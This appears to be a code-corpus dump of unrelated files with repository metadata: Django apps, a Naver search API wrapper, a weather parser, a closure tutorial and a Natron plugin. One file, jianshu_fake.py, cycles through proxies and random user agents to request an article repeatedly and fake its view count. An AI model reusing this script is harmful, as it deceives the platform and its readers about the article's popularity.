checklist[ 'Sr20R21_a12_p0_U20_z10_tr' ] = 1
checklist[ 'Sr20R21_a12_p6_U20_z00_tr' ] = 1
checklist[ 'Sr20R21_a12_p6_U20_z05_tr' ] = 0
checklist[ 'Sr20R21_a12_p6_U20_z10_tr' ] = 1
checklist[ 'Sr20R21_a-12_p0_U20_z00_tr' ] = 1
checklist[ 'Sr20R21_a-12_p0_U20_z05_tr' ] = 1
checklist[ 'Sr20R21_a-12_p0_U20_z10_tr' ] = 1
checklist[ 'Sr20R21_a-12_p6_U20_z00_tr' ] = 1
checklist[ 'Sr20R21_a-12_p6_U20_z05_tr' ] = 0
checklist[ 'Sr20R21_a-12_p6_U20_z10_tr' ] = 1
checklist[ 'Slit20R21_a0_p0_U20_z00_tr' ] = 1
checklist[ 'Slit20R21_a0_p0_U20_z05_tr' ] = 1
checklist[ 'Slit20R21_a0_p0_U20_z10_tr' ] = 1
checklist[ 'Slit20R21_a12_p0_U20_z00_tr' ] = 1
checklist[ 'Slit20R21_a-12_p0_U20_z00_tr' ] = 1
checklist[ 'Slit20R21_a-12_p0_U20_z05_tr' ] = 1
checklist[ 'Slit20R21_a-12_p0_U20_z10_tr' ] = 1
|
[
"carlosarceleon@gmail.com"
] |
carlosarceleon@gmail.com
|
48d6bc4a560547ba09d497e180b5e52b9b169c48
|
39b9828edd17169507ab0940f5ffc3899eeecfe7
|
/basketballs/admin.py
|
b2763cdf3b6e6c0acd6a242db9acae5e55825d6f
|
[] |
no_license
|
Nilansha/basketball-league-django-rest-api
|
de6780a2a39b8d96c57712a26b1650d3a070a07b
|
46d88acf4912236fd9073ab166d16dce794b0b2e
|
refs/heads/main
| 2023-06-25T21:51:33.967147
| 2021-07-12T17:11:09
| 2021-07-12T17:11:09
| 385,018,611
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 317
|
py
|
from django.contrib import admin
from .models import team,player,match,match_detail,player_point
# Register your models here.
admin.site.register(team.Team)
admin.site.register(player.Player)
admin.site.register(match.Match)
admin.site.register(match_detail.MatchDetail)
admin.site.register(player_point.PlayerPoint)
|
[
"nilanshacas@gmail.com"
] |
nilanshacas@gmail.com
|
669931fd5f01d49f5b460a8e0a064989aedacdc2
|
f946a4ffaa9a9fb849cfac16ce56184366290dfd
|
/employee/forms.py
|
9b7a6b5377e3b06d7fd13c0c80bee6a66127291d
|
[] |
no_license
|
Dharit-shah/Crud
|
85f842529bf2590f9b04d833381c88744eb6e59a
|
de2fdd6bdc3b2e22624c6ca60608774cf1b5ccbf
|
refs/heads/main
| 2023-03-24T18:53:00.440979
| 2021-03-18T07:30:53
| 2021-03-18T07:30:53
| 348,960,821
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 296
|
py
|
from django import forms
from .models import Employee
from .models import Product
class EmployeeForm(forms.ModelForm):
class Meta:
model = Employee
fields = "__all__"
class ProductForm(forms.ModelForm):
class Meta:
model = Product
fields = "__all__"
|
[
"dharitvi.dev@gmail.com"
] |
dharitvi.dev@gmail.com
|
734ec78dfed1cd1224f0f1d7b409383e4d0ded76
|
3a823c96f8a88d56aa6a75b7c2db896a27086246
|
/mysite/trips/migrations/0001_initial.py
|
a010fd960406c574833775143e1a4a17f949494b
|
[] |
no_license
|
andreanvictor6374/d3-django
|
8dcc6d4855795ed0e0a1aa75d5a14406d4f59467
|
0820870d53bf3efc18b8a9eab7201613c8663dce
|
refs/heads/master
| 2023-03-17T21:54:30.026125
| 2015-07-31T19:57:01
| 2015-07-31T19:57:01
| 534,475,512
| 1
| 0
| null | 2022-09-09T02:52:41
| 2022-09-09T02:52:41
| null |
UTF-8
|
Python
| false
| false
| 733
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(primary_key=True, auto_created=True, verbose_name='ID', serialize=False)),
('title', models.CharField(max_length=100)),
('content', models.TextField(blank=True)),
('photo', models.URLField(blank=True)),
('location', models.CharField(max_length=100)),
('created_at', models.DateTimeField(auto_now_add=True)),
],
),
]
|
[
"lafei.work@gmai.com"
] |
lafei.work@gmai.com
|
af9fe1544d461c341d7d3020b1612f36c44d6098
|
09beae3af23b61663f1c773c2ae5582bcdb1f382
|
/plots/pyplots3.py
|
6f2b45e42ae3b7eaf97feb1216fe4d7d07addcfc
|
[] |
no_license
|
edurbrito/eat-express-tsp
|
75b9dc5e563232101ae1637a1560e116cbf75e6d
|
1a7543e8efa020af7bb5288dd32e8ddc99bdd412
|
refs/heads/master
| 2023-02-21T06:43:04.107212
| 2021-01-22T23:22:30
| 2021-01-22T23:22:30
| 332,085,130
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 212
|
py
|
import matplotlib.pyplot as plt
x = [256, 142, 400, 206, 900, 498]
y1 = [256, 9, 400, 10, 900, 10]
y2 = [256, 20, 400, 17, 900, 26]
plt.scatter(x, y1, marker='o')
plt.savefig("../logs/phase3/connectivity.png")
|
[
"up201806271@fe.up.pt"
] |
up201806271@fe.up.pt
|
15e7b43b15e444edf6aaa55a9b3a08d2f73be6f6
|
5a731188905fac45f62fca7d7745919476259a2f
|
/naver_keyword_search/api_manager.py
|
aab5b194c0ae5605b25102593f4624bfacf8eecb
|
[] |
no_license
|
hhg8840/naver_keyword
|
a2d265bea7e528a9861c4126dac429de937fcc06
|
1bbc40db90aa0af52f266da67016306ef61c499b
|
refs/heads/main
| 2023-08-27T06:09:43.132432
| 2021-10-21T19:07:21
| 2021-10-21T19:07:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,006
|
py
|
import requests
import time
from datetime import datetime
from dateutil.relativedelta import relativedelta
import urllib.request
import json
from multiprocessing import Pool
import replace
from naver_keyword_search import function
import hashlib
import logging
logger = logging.getLogger(__name__)
def calculatestar(args):
def calculate(func, args):
result = func(*args)
# print(len(result))
return result
return calculate(*args)
class Naver_api():
def __init__(self, keyword: list, api_key: dict, url: str, kind: list):
self.id = api_key['client_id']
self.secret = api_key['client_secret']
self.content = keyword
self.acumulation = list(zip(self.id, self.secret))
self.processes = 5
self.url = url
self.kind = kind
self.today = datetime.today().strftime("%Y%m%d")
self.now_time = datetime.today().strftime("%H%M%S")
def ragged_chunks(self, seq, chunks):
size = len(seq)
start = 0
for i in range(1, chunks + 1):
stop = i * size // chunks
yield seq[start:stop]
start = stop
def get_keyword(self):
collect = []
for row in self.content:
a = {
'sentence': f"{row['is_str']}, {row['name']}",
'is_str': row['is_str'],
'issn': row['issn'],
'name': row['name'],
'code': row['code'],
}
collect.append(a)
# print(f'total keyword_stkname is {len(collect)} in get_keyword')
return collect
def manipulate(self):
"""
1. first divide a number of chunks of keywords and stock_name
by 5 chunks
2. make a list with api method and api_key dictionary
3.
"""
try:
collect = self.get_keyword()
# print(f'Creating pool with {self.processes} processes')
x = self.ragged_chunks(collect, self.processes)
task = [(self.api,(row, self.acumulation[i], i)) for i, row in enumerate(x)]
with Pool(self.processes) as pool:
a = pool.map(calculatestar, task)
return a
except Exception as err:
logger.error(f'Error happend in manipulate {err}')
def get_info(self, a: dict):
#헤더에 아이디와 키 정보 넣기
headers = {'X-Naver-Client-Id' : a['id'],
'X-Naver-Client-Secret': a['secret']
}
r = requests.get(a['url'], headers=headers)
return r
def api(self, keyword, key, i):
try:
accumulate = []
j = 0
# print(f'{i}th is executing')
for row in keyword:
for k, link in enumerate(self.url):
a={
'id': key[0],
'secret': key[1],
'url': link.format(sent=row['sentence']),
}
signal = self.get_info(a)
if signal.status_code == 429:
continue
# print(f'signal of {row} is {signal}')
resp = signal.json()
if not resp['items']:
# print(f'result of resp{result}')
continue
result = resp['items']
accumulate.append({
'is_str': row['is_str'],
'name': row['name'],
'code': row['code'],
'kind': self.kind[k],
'result': result,
'issn': row['issn'],
})
# j+=1
# print(f'{j}th is executing')
# if j == 10:
# break
# print(f'the count of result of dictionarized data is {len(result)}')
result = self.get_attrebute(accumulate)
return result
except Exception as err:
logger.error(f'{i} th {err}')
def get_attrebute(self, info: list, col=[]):
# print(f'parameter number is {len(info)}')
for row in info:
for r in row['result']:
a = self.get_filter(r['description'], row['is_str'], row['name'])
if not a:
col.extend('')
elif r.get('pubDate'):
col.append({
'D_COL': self.today,
'T_COL': self.now_time,
'IS_STR': row['is_str'],
'CODE': row['code'],
'KIND': function.change_kind(row['kind']),
'TITLE': function.to_kor(r['title']),
'ISSN': row['issn'],
'DESCRIPTION': function.to_kor(r['description']),
'PUBDATE': function.str_to_date_str(r['pubDate']),
'URL': r['link'],
})
elif r.get('postdate'):
col.append({
'D_COL': self.today,
'T_COL': self.now_time,
'IS_STR': row['is_str'],
'CODE': row['code'],
'KIND': function.change_kind(row['kind']),
'TITLE': function.to_kor(r['title']),
'ISSN': row['issn'],
'DESCRIPTION': function.to_kor(r['description']),
'PUBDATE': r['postdate'],
'URL': r['bloggerlink'],
})
else:
if r.get('cafeurl'):
col.append({
'D_COL': self.today,
'T_COL': self.now_time,
'IS_STR': row['is_str'],
'CODE': row['code'],
'KIND': function.change_kind(row['kind']),
'TITLE': function.to_kor(r['title']),
'ISSN': row['issn'],
'DESCRIPTION': function.to_kor(r['description']),
'PUBDATE': None,
'URL': r['cafeurl'],
})
else:
col.append({
'D_COL': self.today,
'T_COL': self.now_time,
'IS_STR': row['is_str'],
'CODE': row['code'],
'KIND': function.change_kind(row['kind']),
'TITLE': function.to_kor(r['title']),
'ISSN': row['issn'],
'DESCRIPTION': function.to_kor(r['description']),
'PUBDATE': None,
'URL': r['link'],
})
return col
def get_filter(self, description, is_str, name):
if (name in description
and is_str in description):
return True
else:
return False
|
[
"pioneer3692@gmail.com"
] |
pioneer3692@gmail.com
|
a0770c8be725bc6e775e9c6ca4caf529c420e522
|
a99b15c87277537c28358e63dde699a9fe5a210b
|
/IncreaseViews/jianshu_fake.py
|
1ddad00437e405e9e058e5f12e642732191f31a2
|
[] |
no_license
|
levinyi/crawler
|
395535a43eaf49c86950c9bada6325cddb3af8e4
|
cc050edb059d0b06111206d4ac33eddf25e1077f
|
refs/heads/master
| 2021-05-12T05:59:38.678308
| 2020-01-19T09:18:26
| 2020-01-19T09:18:26
| 117,208,255
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,191
|
py
|
import time
import socket
import random
import urllib
socket.setdefaulttimeout(3)
user_agent_list = [
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/45.0.2454.85 Safari/537.36 115Browser/6.0.3',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SE 2.X MetaSr 1.0; SE 2.X MetaSr 1.0; .NET CLR 2.0.50727; SE 2.X MetaSr 1.0)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
]
f = open("proxy","r")
lines = f.readlines()
proxys = []
for i in range(0, len(lines)):
ip = lines[i].strip("\n").split(",")
proxy_host = 'http://' + ip[0] + ':' + ip[1]
print(proxy_host)
proxy_temp = {"http": proxy_host}
proxys.append(proxy_temp)
urls = [
"https://www.jianshu.com/p/4131fbf8cd3e",
]
j = 1
for i in range(100):
for proxy in proxys:
for url in urls:
try:
user_agent = random.choice(user_agent_list)
proxy_support = urllib.request.ProxyHandler(proxy)
opener = urllib.request.build_opener(proxy_support, urllib.request.HTTPHandler)
urllib.request.install_opener(opener)
req = urllib.request.Request(url)
c = urllib.request.urlopen(req)
print("successfully", j)
j += 1
time.sleep(5)
except Exception as e:
print(proxy)
print(e)
continue
|
[
"dushiyi319@163.com"
] |
dushiyi319@163.com
|
537aef1a81602cb0e14b2b2c236e8dd4a8ed96af
|
6e705e46faa931f49477335185ade2d68ba97bec
|
/p_chapter05_02.py
|
1ef91c75cadae06b0d086ccb6a4807eb41a922d5
|
[] |
no_license
|
kiyong21c/class_lv2
|
3cbb3ec3e6b09c30f589d1c3b1e4b0140a6659dd
|
d0aba2472da7919d31faa7c4197c063c39ec8ae2
|
refs/heads/master
| 2023-08-16T21:41:43.602174
| 2021-09-29T13:15:33
| 2021-09-29T13:15:33
| 404,745,586
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,291
|
py
|
# Chapter05-02
# 일급 함수(일급 객체)
# 클로저 기초
# 파이썬 변수 범위(Scope)
# Ex1
def func_v1(a):
print(a)
print(b)
# func_v1(10) # NameError: name 'b' is not defined
# Ex2
b = 20
def func_v2(a):
print(a)
print(b)
func_v2(10)
# Ex3-1
c = 30
def func_v3(a):
print(a)
print(c) # UnboundLocalError: local variable 'c' referenced before assignment
c = 40
# func_v3(10)
# Ex3-2
c = 30
def func_v3(a):
c = 40
print(a)
print(c) # local variable 'c' 참조
print('>>',c) # global variable 'c' 참조
func_v3(10)
# Ex3-3
c = 30
def func_v3(a):
global c ## 함수내에 global 사용하는것은 추천되는 코딩은 아님
print(a)
print(c) # local variable 'c' 참조
c = 40
print('>>', c) # global variable 'c' 참조
func_v3(10)
print('>>>', c) # global 선언된 'c' 가 참조
# Closure(클로저) 사용 이유
# 서버 프로그래밍 → 동시성(concurrency) 제어 → 같은 메모리 공간에 여러 자원이 접근 → 교착상태(Dead Lock)
# 메모리를 공유하지 않고 메시지 전달로 처리하기 위한 → Erlang
# 클로저는 공유하되 변경되지 않는(Immutable, Read Only) 구조를 적극적으로 사용 → 함수형 프로그래밍
# 클로저는 불변자료구조 및 atom,STM → 멀티스레드(Coroutine) 프로그래밍에 강점
# 함수가 끝났어도 함수 내부의 상태를 기억한다
a = 100
print(a + 100)
print(a + 1000)
# 결과 누적(함수 사용)
print(sum(range(1,51))) # sum 함수
# 클래스 이용
class Averager():
def __init__(self):
self._series = []
def __call__(self, v): # __call__ 매직메소드가 있으면 callable하다 : class를 함수처럼 호출할 수 있음
self._series.append(v)
print('inner >> {} / {}'.format(self._series, len(self._series)))
return sum(self._series) / len(self._series)
# 인스턴스 생성
averager_cls = Averager()
# 누적
print(averager_cls(10)) # 클래스를 함수처럼 실행
print(averager_cls(30)) # 클래스를 함수처럼 실행
print(averager_cls(50)) # 클래스를 함수처럼 실행
# 클래스가 실행되고 난 이후에 .series의 리스트 안에 기억되고 있음 : 클로저의 개념
|
[
"kiyong21c@naver.com"
] |
kiyong21c@naver.com
|
b68bcb6eb6e5671b8e58e91f6d724b097f99c733
|
cd786482154d3a72ef261da2da5e40abfb2cebe0
|
/import_data/views.py
|
fb8aac5b8add33e49c4d9d53c134cd7d1c574acc
|
[] |
no_license
|
B9527/django_data_project
|
4a408592e166f8ae3edd118f3ef452ce21558a81
|
cb5f6696a37c8aebeb1e956b4445d007b062baf9
|
refs/heads/master
| 2021-09-01T02:06:15.055216
| 2017-12-24T10:00:54
| 2017-12-24T10:00:54
| 114,749,041
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,225
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import json
import datetime
from django.http import HttpResponseRedirect
from django.utils.datastructures import MultiValueDictKeyError
from django.views import View
from django.shortcuts import render, HttpResponse
from django.core.paginator import Paginator, InvalidPage, EmptyPage, PageNotAnInteger
from .models import ImportTask, CommandRecord, HiveTable
from .loader import read_excel
# restapi
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
# my error exexption
from utils.erroeException import MyException
# get_or_404
from django.shortcuts import get_object_or_404
from django.db.models import Q
class UploadView(APIView):
def post(self, request, format=None):
return_data = {
"msg": "上传出错,请重新上传!",
"code": 400,
"result": {
}
}
# 读取excel表格信息
post_request_data = self.request.data
configs = []
config_num = 0
try:
format_type = post_request_data['type']
file_obj = post_request_data['file']
if (file_obj.name).split('.')[1] not in ['txt', 'xlsx']:
raise MyException(400, "上传文件类型不对!")
configs = read_excel(file_obj, format_type)
for config in configs:
config_num = config_num + 1
writer = config['writer']
reader = config['reader']
options = config['options']
table_info = config['table_info']
# save hive table and column information
hive_table_args = {"database": table_info['database'], "table_comment": table_info['table_comment'], "table": table_info['table']}
if HiveTable.objects.filter(**hive_table_args).exists():
hive_table_objlist = HiveTable.objects.filter(**hive_table_args)
for hive_table_obj in hive_table_objlist:
hive_table_obj.delete()
for i in range(0, len(table_info['column_index'])):
hive_table = {}
hive_table['database'] = table_info['database']
hive_table['table_comment'] = table_info['table_comment']
hive_table['table'] = table_info['table']
hive_table['column'] = table_info['column'][i]
hive_table['column_comment'] = table_info['columns_comment'][i]
hive_table['column_index'] = table_info['column_index'][i]
hive_table['column_type'] = table_info['column_type'][i]
if hive_table['column_type'].lower() in ['date', 'timestamp', 'datetime']:
hive_table['time_format'] = table_info['coltime_formatumn_type'][i]
else:
hive_table['time_format'] = None
hive_table_obj = HiveTable(**hive_table)
hive_table_obj.save()
# save import data task
args = {'writer': writer, 'reader': reader, 'options': options}
if ImportTask.objects.filter(**args).exists():
raise MyException(400, "task %s already exists" % writer['table'])
else:
args["start_time"] = datetime.datetime.now()
task = ImportTask(**args)
task.save()
return_data['code'] = 200
return_data['msg'] = "success"
except MultiValueDictKeyError:
return_data['code'] = 400
return_data['msg'] = 'please upload you file'
except KeyError as e:
return_data['code'] = 400
return_data['msg'] = str(e) + " is missing in " + file_obj.name
except MyException as e:
return_data['code'] = e.error_code
return_data['msg'] = e.error_message
except Exception as e:
return_data['code'] = 400
return_data['msg'] = str(e)
finally:
return Response(return_data, status=status.HTTP_200_OK)
class TaskListView(APIView):
def get(self, request, format=None):
print self.request.GET
pageNum = 1
pageSize = 20
args = {}
if 'id' in self.request.GET.keys():
args['id'] = self.request.GET['id']
if 'pageNum' in self.request.GET.keys():
pageNum = int(self.request.GET['pageNum'])
if 'pageSize' in self.request.GET.keys():
pageSize = int(self.request.GET['pageSize'])
if 'status' in self.request.GET.keys():
status_ = self.request.GET['status']
if status_ == "all":
pass
else:
print status_
args['status'] = status
task_list = ImportTask.objects.filter(**args).order_by('-id')
if 'search_data' in self.request.GET.keys():
search_data = self.request.GET.dict()['search_data']
task_list = task_list.filter(Q(reader__table__icontains=search_data) | Q(writer__table__icontains=search_data))
total = task_list.count()
task_list = task_list[(pageNum-1)*pageSize:pageNum*pageSize]
pure_task_list = []
for task in task_list:
pure_task = {}
pure_task['file_name'] = task.reader['file_name']
pure_task['read_table'] = task.reader['table']
pure_task['write_table'] = task.writer['table']
pure_task['status'] = task.status
pure_task['start_time'] = task.start_time
pure_task['finish_time'] = task.finish_time
pure_task['id'] = task.id
pure_task_list.append(pure_task)
# 返回数据格式
return_data = {
"msg": "success",
"code": 200,
"result": {"task_list": pure_task_list, "pageSize": pageSize, "pageNum": pageNum, "total": total, }
}
return Response(return_data, status=status.HTTP_200_OK)
class DelTaskView(APIView):
def post(self, request):
request_data = json.loads(self.request.data['request_delete_list'])
print request_data
for id in request_data:
task_obj = get_object_or_404(ImportTask, pk=id)
task_obj.delete()
return_data = {
"msg": "success",
"code": 200,
"result": {}
}
return Response(return_data, status=status.HTTP_200_OK)
class ChangeStatusSubmit(APIView):
def post(self, request):
request_data = json.loads(self.request.data['request_submit_list'])
print request_data
for id in request_data:
task_obj = get_object_or_404(ImportTask, pk=id)
task_obj.status = "submit"
task_obj.save()
return_data = {
"msg": "success",
"code": 200,
"result": {}
}
return Response(return_data, status=status.HTTP_200_OK)
class TaskRecord(APIView):
def post(self, request):
import time
print(time.time())
args = {}
if 'id' in request.data.keys():
id = request.data['id']
args['task_id'] = id
print args
task_record_list = CommandRecord.objects.filter(**args)
pure_record_list = []
for task_record in task_record_list:
pure_record = {}
pure_record['step'] = task_record.step
pure_record['command'] = task_record.command
pure_record['status'] = task_record.status
pure_record['start_time'] = task_record.start_time
pure_record['finish_time'] = task_record.finish_time
pure_record['log'] = task_record.log
pure_record_list.append(pure_record)
return_data = {
"msg": "success",
"code": 200,
"result": {"task_record": pure_record_list}
}
print return_data
print time.time()
return Response(return_data, status=status.HTTP_200_OK)
|
[
"1335239218@qq.com"
] |
1335239218@qq.com
|
a4ecf46c6cdfa69d3a1228ab6136f7e0fda10303
|
f80eae621453835bac0749094d0ce8be50dc9c77
|
/controller/config.py
|
98d4967e0b5503901dc6db4ee3ea222015d2313a
|
[] |
no_license
|
DanielKusyDev/rpi-home-automation
|
bcb9bce951f6bdaf8c98d7cbc3f3af302a2a2b09
|
6bfff2d66c71da305bf13872c97ef51df4337417
|
refs/heads/main
| 2023-07-28T14:53:34.371903
| 2021-09-10T16:18:17
| 2021-09-10T16:18:17
| 368,314,559
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 487
|
py
|
from os import environ
from dotenv import load_dotenv
from loguru import logger
logger.add(f"logs/info.log", format="{time} {level} {message}", level="INFO", rotation="500 MB")
load_dotenv()
SERVER_HOST = environ.get("SERVER_HOST")
SERVER_PORT = environ.get("SERVER_PORT")
DB_HOST = environ.get("DB_HOST")
DB_PORT = environ.get("DB_PORT")
DB_USER = environ.get("DB_USER")
DB_PASSWORD = environ.get("DB_PASSWORD")
DB_NAME = environ.get("DB_NAME")
DB_DRIVER = environ.get("DB_DRIVER")
|
[
"daniel.kusy97@gmail.com"
] |
daniel.kusy97@gmail.com
|
9079c57c1304e3afc6646edd8aec4103ff06e87e
|
24fc379db02edbb4b780f57ddf1c1a4bf50fd96e
|
/a1.py
|
926c5e6042636da938e31f9b6dac55b489d9f73f
|
[] |
no_license
|
Tanya3108/weatherforecast
|
841a229028f576c42249ec3bd51b9c8eb45fb9e7
|
e6fd92fea282029066b9f80922ee93f916135132
|
refs/heads/master
| 2020-04-28T01:37:26.391547
| 2019-03-10T18:30:23
| 2019-03-10T18:30:23
| 174,863,601
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,537
|
py
|
0# Name:Tanya Sanjay Kumar, Rollno.:2018109 , Section:A , Group:5
import urllib.request
import datetime
# function to get weather response
def weather_response(location, API_key):
# write your code
url=urllib.request.urlopen(str("http://api.openweathermap.org/data/2.5/forecast?q="+location+"&APPID="+API_key))
json=url.read().decode('UTF8')
return json
# function to check for valid response
def has_error(location,json):
# write your code
a=json.find(location)
if a==-1:
return True
else:
return False
# function to get attributes on nth day1
def get_temperature (json, n, t):
# write your code
if n>=0 and n<=4:
t=str(t)
if t in ["00:00:00","03:00:00","06:00:00","09:00:00","12:00:00","15:00:00","18:00:00","21:00:00"]:
n1=datetime.date.today().day+n
if len(str(n1))==1:
n1="0"+str(n1)
n2=datetime.date.today().strftime('%Y-%m-' + str(n1))
a=int(json.find(n2+" "+t))
part=json[a-355:a+21]
temp1=part.find("temp")
temp2=part.find("temp_min")
temp=part[temp1+6:temp2-2]
return temp
else:
print("Incorrect time format. Pls enter correctly . Ex:03:00:00,06:00:00")
else:
print("Enter a number between 0 to 4 only")
def get_humidity(json, n, t):
# write your code
if n>=0 and n<=4:
t=str(t)
if t in ["00:00:00","03:00:00","06:00:00","09:00:00","12:00:00","15:00:00","18:00:00","21:00:00"]:
n1=datetime.date.today().day+n
if len(str(n1))==1:
n1="0"+str(n1)
n2=datetime.date.today().strftime('%Y-%m-' + str(n1))
a=int(json.find(n2+" "+t))
part=json[a-355:a+21]
hum1=part.find("humidity")
hum2=part.find("temp_kf")
hum=part[hum1+10:hum2-2]
return hum
else:
print("Incorrect time format. Pls enter correctly . Ex:03:00:00,06:00:00")
else:
print("Enter a number between 0 to 4 only")
def get_pressure(json, n, t):
# write your code
if n>=0 and n<=4:
t=str(t)
if t in ["00:00:00","03:00:00","06:00:00","09:00:00","12:00:00","15:00:00","18:00:00","21:00:00"]:
n1=datetime.date.today().day+n
if len(str(n1))==1:
n1="0"+str(n1)
n2=datetime.date.today().strftime('%Y-%m-' + str(n1))
a=int(json.find(n2+" "+t))
part=json[a-355:a+21]
pres1=part.find("pressure")
pres2=part.find("sea_level")
pres=part[pres1+10:pres2-2]
return pres
else:
print("Incorrect time format. Pls enter correctly . Ex:03:00:00,06:00:00")
else:
print("Enter a number between 0 to 4 only")
def get_wind(json, n, t):
# write your code
if n>=0 and n<=4:
t=str(t)
if t in ["00:00:00","03:00:00","06:00:00","09:00:00","12:00:00","15:00:00","18:00:00","21:00:00"]:
n1=datetime.date.today().day+n
if len(str(n1))==1:
n1="0"+str(n1)
n2=datetime.date.today().strftime('%Y-%m-' + str(n1))
a=int(json.find(n2+" "+t))
part=json[a-355:a+21]
wind1=part.find("speed")
wind2=part.find("deg")
wind=part[wind1+7:wind2-2]
return wind
else:
print("Incorrect time format. Pls enter correctly . Ex:03:00:00,06:00:00")
else:
print("Enter a number between 0 to 4 only")
def get_sealevel(json, n, t):
# write your code
if n>=0 and n<=4:
t=str(t)
if t in ["00:00:00","03:00:00","06:00:00","09:00:00","12:00:00","15:00:00","18:00:00","21:00:00"]:
n1=datetime.date.today().day+n
if len(str(n1))==1:
n1="0"+str(n1)
n2=datetime.date.today().strftime('%Y-%m-' + str(n1))
a=int(json.find(n2+" "+t))
part=json[a-355:a+21]
sea1=part.find("sea_level")
sea2=part.find("grnd_level")
sea=part[sea1+11:sea2-2]
return sea
else:
print("Incorrect time format. Pls enter correctly . Ex:03:00:00,06:00:00")
else:
print("Enter a number between 0 to 4 only")
|
[
"noreply@github.com"
] |
Tanya3108.noreply@github.com
|
c0f96caa76568040c2beeb3772902b5a5872d669
|
6c066611b11a8de5e2c22c30cfcc578a4c49edce
|
/BL/Color/bl_Bytes/bl_Bytes.py
|
452be86089e5169c6b247f97ed30a110a1e8973e
|
[] |
no_license
|
NatronGitHub/natron-plugins
|
ad2d9227637b4b86b45f92856fa54d327872a0a6
|
b0c499fb6391024f54be9f26ed41b5cf7475d574
|
refs/heads/master
| 2022-12-12T10:02:20.252222
| 2022-11-30T02:29:04
| 2022-11-30T02:29:04
| 130,576,224
| 332
| 67
| null | 2022-11-30T02:29:05
| 2018-04-22T14:39:29
|
Python
|
UTF-8
|
Python
| false
| false
| 15,013
|
py
|
# -*- coding: utf-8 -*-
# DO NOT EDIT THIS FILE
# This file was automatically generated by Natron PyPlug exporter version 10.
# Hand-written code should be added in a separate file named bl_BytesExt.py
# See http://natron.readthedocs.org/en/master/devel/groups.html#adding-hand-written-code-callbacks-etc
# Note that Viewers are never exported
import NatronEngine
import sys
# Try to import the extensions file where callbacks and hand-written code should be located.
try:
from bl_BytesExt import *
except ImportError:
pass
def getPluginID():
return "natron.community.plugins.bl_Bytes"
def getLabel():
return "bl_Bytes"
def getVersion():
return 1
def getIconPath():
return "bl_Bytes.png"
def getGrouping():
return "Community/BL/Color"
def getPluginDescription():
return "Node is similar to the Shake\'s one. It convert the picture in another byte space. This is of course a simple simulation as Nuke know to work only in 32 floating point color space. "
def createInstance(app,group):
# Create all nodes in the group
# Create the parameters of the group node the same way we did for all internal nodes
lastNode = group
lastNode.setColor(0.3333, 0.702, 0.3529)
# Create the user parameters
lastNode.Controls = lastNode.createPageParam("Controls", "Controls")
param = lastNode.createStringParam("sep01", "")
param.setType(NatronEngine.StringParam.TypeEnum.eStringTypeLabel)
# Add the param to the page
lastNode.Controls.addParam(param)
# Set param properties
param.setHelp("")
param.setAddNewLine(True)
param.setEvaluateOnChange(False)
param.setAnimationEnabled(False)
lastNode.sep01 = param
del param
param = lastNode.createStringParam("sep02", "")
param.setType(NatronEngine.StringParam.TypeEnum.eStringTypeLabel)
# Add the param to the page
lastNode.Controls.addParam(param)
# Set param properties
param.setHelp("")
param.setAddNewLine(True)
param.setEvaluateOnChange(False)
param.setAnimationEnabled(False)
lastNode.sep02 = param
del param
param = lastNode.createSeparatorParam("SETUP", "Setup")
# Add the param to the page
lastNode.Controls.addParam(param)
# Set param properties
param.setHelp("")
param.setAddNewLine(True)
param.setPersistent(False)
param.setEvaluateOnChange(False)
lastNode.SETUP = param
del param
param = lastNode.createStringParam("sep03", "")
param.setType(NatronEngine.StringParam.TypeEnum.eStringTypeLabel)
# Add the param to the page
lastNode.Controls.addParam(param)
# Set param properties
param.setHelp("")
param.setAddNewLine(True)
param.setEvaluateOnChange(False)
param.setAnimationEnabled(False)
lastNode.sep03 = param
del param
param = lastNode.createStringParam("sep04", "")
param.setType(NatronEngine.StringParam.TypeEnum.eStringTypeLabel)
# Add the param to the page
lastNode.Controls.addParam(param)
# Set param properties
param.setHelp("")
param.setAddNewLine(True)
param.setEvaluateOnChange(False)
param.setAnimationEnabled(False)
lastNode.sep04 = param
del param
param = lastNode.createIntParam("bytes", "Bits per channel : ")
param.setMinimum(1, 0)
param.setMaximum(32, 0)
param.setDisplayMinimum(1, 0)
param.setDisplayMaximum(32, 0)
param.setDefaultValue(2, 0)
param.restoreDefaultValue(0)
# Add the param to the page
lastNode.Controls.addParam(param)
# Set param properties
param.setHelp("")
param.setAddNewLine(True)
param.setAnimationEnabled(True)
lastNode.bytes = param
del param
param = lastNode.createStringParam("sep05", "")
